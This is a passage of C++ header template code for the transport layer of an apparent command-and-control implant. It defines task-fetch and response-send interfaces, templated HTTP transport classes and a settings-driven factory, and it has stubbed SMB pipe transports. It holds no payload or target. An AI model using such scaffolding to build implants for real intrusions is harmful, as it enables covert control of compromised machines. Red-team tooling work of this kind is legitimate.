#pragma once
#include <windows.h>
#include <string>
#include <vector>
#include "../protocols/json/json.h"
#include "../control/settings.h"
// ==========================================================
// BASE INTERFACES
// ==========================================================

//base class to derive each transport method off of. tldr, it's more boilerplate code to do this,
// but makes it easier IMO to track/structure. 
class IIngressTransport {
public:
    virtual ~IIngressTransport() = default;
    // our "sleep" function, or what to wait for. 
    // Universal for a sleep time, or someting like a pipe that waits
    virtual HANDLE get_wait_handle() = 0; 
    //func to get our task
    virtual nlohmann::json fetch_task(const std::string& uuid) = 0;
};

class IEgressTransport {
public:
    virtual ~IEgressTransport() = default;
    //func to send response
    virtual void send_response(const std::string& uuid, std::vector<uint8_t> task_response_msgpack_list) = 0;
};

// ==========================================================
// 2. HTTP IMPLEMENTATIONS (Amazon Profile)
// ==========================================================

// Forward declarations of GET functions from comms.cpp

[%- for c2_get_profile in get_function_mappings.values() %]

nlohmann::json [[ c2_get_profile.value]](std::string implant_uuid);

[%- endfor %]

// Forward declarations of POST functions from comms.cpp

[%- for c2_post_profile in post_function_mappings.values() %]

int [[ c2_post_profile.value]](std::string implant_uuid, std::vector<uint8_t> task_response_msgpack_list);

[%- endfor %]


//Declare classes for each comms type

[%- for c2_get_profile in get_function_mappings.values() %]

class [[ c2_get_profile.value ]]_class : public IIngressTransport {
public:
    //return NULL on non pipe/handle returning transport methods.
    //parent loop handles this by reverting to a wait for single, which waits
    //for the worker.
    HANDLE get_wait_handle() override {
        return NULL;
    }
    nlohmann::json fetch_task(const std::string& uuid) override {
        return [[ c2_get_profile.value ]](uuid);
    }
};

[%- endfor %]

[%- for c2_post_profile in post_function_mappings.values() %]

class [[ c2_post_profile.value ]]_class : public IEgressTransport {
public:
    void send_response(const std::string& uuid, std::vector<uint8_t> task_response_msgpack_list) override {
        [[ c2_post_profile.value ]](uuid, task_response_msgpack_list);
    }
};

[%- endfor %]


/* endtemplate */


//later
// // ==========================================================
// // 3. PIPE IMPLEMENTATIONS (SMB Profile)
// // ==========================================================

// class PipeIngress : public IIngressTransport {
// private:
//     HANDLE h_inbox_;
// public:
//     PipeIngress(HANDLE h) : h_inbox_(h) {
//     }
//     HANDLE get_wait_handle() override {
//         return h_inbox_;
//     }
//     nlohmann::json fetch_task(const std::string& uuid) override {
//         // [TODO] Add Overlapped Read logic here
//         return nlohmann::json();
//     }
// };

// class PipeEgress : public IEgressTransport {
// private:
//     HANDLE h_outbox_;
// public:
//     PipeEgress(HANDLE h) : h_outbox_(h) {
//     }
//     void send_response(const std::string& uuid, std::vector<uint8_t> batched_data) override {
//         // [TODO] Add Overlapped Write logic here
//     }
// };

// ==========================================================
// 4. THE LOOKUP FACTORY
// ==========================================================

inline IIngressTransport* GetCurrentIngress() {
    std::string strat = SettingsManager::instance().get<std::string>("comms_get_function", "");

    //template - declare if tree for function names
    [%- for c2_get_profile in get_function_mappings.values() %]

    if (strat.find("[[ c2_get_profile.value ]]") != std::string::npos) {
        static [[ c2_get_profile.value ]]_class instance;
        return &instance;
    }

    [% endfor %]

    /* template end */

    //EXCLUDING FOR NOW FOR DEV
    //always include pipe
    //if (strat.find("pipe") != std::string::npos) {
    //    HANDLE h = SettingsManager::instance().get<HANDLE>("h_inbox_pipe", INVALID_HANDLE_VALUE);
    //    static PipeIngress instance(h);
    //    return &instance;
    //}
    //return nullptr;
}

inline IEgressTransport* GetCurrentEgress() {
    std::string strat = SettingsManager::instance().get<std::string>("comms_post_function", "");

    [%- for c2_post_profile in post_function_mappings.values() %]
    
    if (strat.find("[[ c2_post_profile.value ]]") != std::string::npos) {
        static [[ c2_post_profile.value ]]_class instance;
        return &instance;
    }
    
    [% endfor %]

    /* template end */
    
    //EXCLUDING FOR NOW FOR DEV
    ////always include pipe
    //if (strat.find("pipe") != std::string::npos) {
    //    HANDLE h = SettingsManager::instance().get<HANDLE>("h_outbox_pipe", INVALID_HANDLE_VALUE);
    //    static PipeEgress instance(h);
    //    return &instance;
    //}
    //return nullptr;
}